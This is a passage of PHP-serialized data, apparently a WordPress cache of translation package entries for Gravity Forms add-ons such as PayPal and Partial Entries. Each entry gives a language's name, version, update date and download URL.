ies-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:3:\"1.7\";s:7:\"updated\";s:25:\"2021-09-14T09:48:18+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformspartialentries/gravityformspartialentries-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:3:\"1.7\";s:7:\"updated\";s:25:\"2023-01-06T17:18:24+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformspartialentries/gravityformspartialentries-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:3:\"1.7\";s:7:\"updated\";s:25:\"2020-12-17T15:55:24+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformspartialentries/gravityformspartialentries-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:3:\"1.7\";s:7:\"updated\";s:25:\"2023-01-06T17:18:31+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformspartialentries/gravityformspartialentries-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:3:\"1.7\";s:7:\"updated\";s:25:\"2023-01-06T17:17:54+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformspartialentries/gravityformspartialentries-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:3:\"1.7\";s:7:\"updated\";s:25:\"2021-08-02T17:40:09+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformspartialentries/gravityformspartialentries-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:3:\"1.7\";s:7:\"updated\";s:25:\"2020-11-05T09:27:36+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformspartialentries/gravityformspartialentries-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:29:\"gravityformspaypalpaymentspro\";a:1:{s:12:\"translations\";a:20:{s:5:\"zh-cn\";a:7:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:3:\"2.7\";s:7:\"updated\";s:25:\"2023-01-06T17:19:44+00:00\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:121:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpaymentspro/gravityformspaypalpaymentspro-zh_CN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:3:\"2.7\";s:7:\"updated\";s:25:\"2022-06-23T19:13:23+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:121:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpaymentspro/gravityformspaypalpaymentspro-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:3:\"2.7\";s:7:\"updated\";s:25:\"2020-11-05T13:08:48+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:121:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpaymentspro/gravityformspaypalpaymentspro-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:3:\"2.7\";s:7:\"updated\";s:25:\"2022-06-27T08:34:12+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:121:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpaymentspro/gravityformspaypalpaymentspro-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:3:\"2.7\";s:7:\"updated\";s:25:\"2022-03-15T13:30:45+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:121:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpaymentspro/gravityformspaypalpaymentspro-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:3:\"2.7\";s:7:\"updated\";s:25:\"2022-06-23T19:13:42+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:118:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpaymentspro/gravityformspaypalpaymentspro-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:5:\"fr-ca\";a:7:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:3:\"2.7\";s:7:\"updated\";s:25:\"2019-12-10T13:12:45+00:00\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:121:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpaymentspro/gravityformspaypalpaymentspro-fr_CA.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fr\";i:1;s:3:\"fra\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:3:\"2.7\";s:7:\"updated\";s:25:\"2021-03-24T14:22:06+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:121:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpaymentspro/gravityformspaypalpaymentspro-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:3:\"2.7\";s:7:\"updated\";s:25:\"2020-11-05T13:07:45+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:121:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpaymentspro/gravityformspaypalpaymentspro-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:3:\"2.7\";s:7:\"updated\";s:25:\"2020-11-05T13:09:54+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:121:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpaymentspro/gravityformspaypalpaymentspro-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:3:\"2.7\";s:7:\"updated\";s:25:\"2023-01-06T17:19:10+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:121:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpaymentspro/gravityformspaypalpaymentspro-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:3:\"2.7\";s:7:\"updated\";s:25:\"2020-11-05T13:08:26+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:121:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpaymentspro/gravityformspaypalpaymentspro-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:3:\"2.7\";s:7:\"updated\";s:25:\"2023-03-14T17:54:30+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:118:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpaymentspro/gravityformspaypalpaymentspro-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:3:\"2.7\";s:7:\"updated\";s:25:\"2021-09-14T09:52:47+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:121:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpaymentspro/gravityformspaypalpaymentspro-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:3:\"2.7\";s:7:\"updated\";s:25:\"2023-01-06T17:19:29+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:121:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpaymentspro/gravityformspaypalpaymentspro-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:3:\"2.7\";s:7:\"updated\";s:25:\"2020-12-17T14:13:06+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:121:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpaymentspro/gravityformspaypalpaymentspro-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:3:\"2.7\";s:7:\"updated\";s:25:\"2020-11-05T13:10:17+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:121:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpaymentspro/gravityformspaypalpaymentspro-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:3:\"2.7\";s:7:\"updated\";s:25:\"2020-11-05T13:09:09+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:121:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpaymentspro/gravityformspaypalpaymentspro-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:3:\"2.7\";s:7:\"updated\";s:25:\"2021-09-29T18:02:03+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:121:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpaymentspro/gravityformspaypalpaymentspro-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:3:\"2.7\";s:7:\"updated\";s:25:\"2023-01-06T17:19:40+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:121:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpaymentspro/gravityformspaypalpaymentspro-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:18:\"gravityformspaypal\";a:1:{s:12:\"translations\";a:20:{s:5:\"zh-cn\";a:7:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:3:\"3.5\";s:7:\"updated\";s:25:\"2023-01-06T17:20:51+00:00\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformspaypal/gravityformspaypal-zh_CN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:3:\"3.5\";s:7:\"updated\";s:25:\"2022-06-23T19:13:23+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformspaypal/gravityformspaypal-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:3:\"3.5\";s:7:\"updated\";s:25:\"2023-01-06T17:20:31+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformspaypal/gravityformspaypal-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:3:\"3.5\";s:7:\"updated\";s:25:\"2022-06-27T08:34:12+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformspaypal/gravityformspaypal-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:3:\"3.5\";s:7:\"updated\";s:25:\"2022-06-27T10:05:05+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformspaypal/gravityformspaypal-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:3:\"3.5\";s:7:\"updated\";s:25:\"2022-06-23T19:13:41+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:96:\"https://packages.translationspress.com/rocketgenius/gravityformspaypal/gravityformspaypal-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:5:\"fr-ca\";a:7:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:3:\"3.5\";s:7:\"updated\";s:25:\"2019-12-10T13:15:51+00:00\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformspaypal/gravityformspaypal-fr_CA.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fr\";i:1;s:3:\"fra\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:3:\"3.5\";s:7:\"updated\";s:25:\"2020-10-21T11:52:44+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformspaypal/gravityformspaypal-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:3:\"3.5\";s:7:\"updated\";s:25:\"2023-01-06T17:19:55+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformspaypal/gravityformspaypal-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:3:\"3.5\";s:7:\"updated\";s:25:\"2023-01-06T17:20:13+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformspaypal/gravityformspaypal-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:3:\"3.5\";s:7:\"updated\";s:25:\"2023-01-06T17:20:15+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformspaypal/gravityformspaypal-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:3:\"3.5\";s:7:\"updated\";s:25:\"2023-01-06T17:20:21+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformspaypal/gravityformspaypal-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:3:\"3.5\";s:7:\"updated\";s:25:\"2023-03-14T17:54:51+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:96:\"https://packages.translationspress.com/rocketgenius/gravityformspaypal/gravityformspaypal-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:3:\"3.5\";s:7:\"updated\";s:25:\"2021-09-14T09:52:14+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformspaypal/gravityformspaypal-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:3:\"3.5\";s:7:\"updated\";s:25:\"2023-01-06T17:20:35+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformspaypal/gravityformspaypal-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:3:\"3.5\";s:7:\"updated\";s:25:\"2020-12-17T15:54:54+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformspaypal/gravityformspaypal-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:3:\"3.5\";s:7:\"updated\";s:25:\"2023-01-06T17:20:40+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformspaypal/gravityformspaypal-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:3:\"3.5\";s:7:\"updated\";s:25:\"2023-01-06T17:20:03+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformspaypal/gravityformspaypal-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:3:\"3.5\";s:7:\"updated\";s:25:\"2021-09-29T18:06:04+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformspaypal/gravityformspaypal-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:3:\"3.5\";s:7:\"updated\";s:25:\"2023-01-06T17:20:46+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformspaypal/gravityformspaypal-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:21:\"gravityformspaypalpro\";a:1:{s:12:\"translations\";a:25:{s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:5:\"1.8.4\";s:7:\"updated\";s:25:\"2022-06-27T09:50:21+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:102:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpro/gravityformspaypalpro-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:5:\"zh-cn\";a:7:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:5:\"1.8.4\";s:7:\"updated\";s:25:\"2022-06-27T10:14:36+00:00\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpro/gravityformspaypalpro-zh_CN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:5:\"zh-hk\";a:7:{s:8:\"language\";s:5:\"zh_HK\";s:7:\"version\";s:5:\"1.8.4\";s:7:\"updated\";s:25:\"2023-03-02T20:50:54+00:00\";s:12:\"english_name\";s:19:\"Chinese (Hong Kong)\";s:11:\"native_name\";s:16:\"香港中文版	\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpro/gravityformspaypalpro-zh_HK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"1.8.4\";s:7:\"updated\";s:25:\"2020-05-13T16:59:29+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpro/gravityformspaypalpro-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"1.8.4\";s:7:\"updated\";s:25:\"2020-05-13T16:55:46+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpro/gravityformspaypalpro-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"1.8.4\";s:7:\"updated\";s:25:\"2020-05-13T16:55:30+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpro/gravityformspaypalpro-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"1.8.4\";s:7:\"updated\";s:25:\"2020-05-13T16:55:02+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpro/gravityformspaypalpro-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"1.8.4\";s:7:\"updated\";s:25:\"2020-05-13T16:55:18+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:102:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpro/gravityformspaypalpro-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:5:\"fr-ca\";a:7:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:5:\"1.8.4\";s:7:\"updated\";s:25:\"2020-05-13T16:54:52+00:00\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpro/gravityformspaypalpro-fr_CA.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fr\";i:1;s:3:\"fra\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"1.8.4\";s:7:\"updated\";s:25:\"2021-03-24T11:58:48+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpro/gravityformspaypalpro-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"1.8.4\";s:7:\"updated\";s:25:\"2020-05-13T16:56:58+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpro/gravityformspaypalpro-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:9:\"de/formal\";a:7:{s:8:\"language\";s:12:\"de_DE_formal\";s:7:\"version\";s:5:\"1.8.4\";s:7:\"updated\";s:25:\"2023-01-26T16:02:58+00:00\";s:12:\"english_name\";s:15:\"German (Formal)\";s:11:\"native_name\";s:13:\"Deutsch 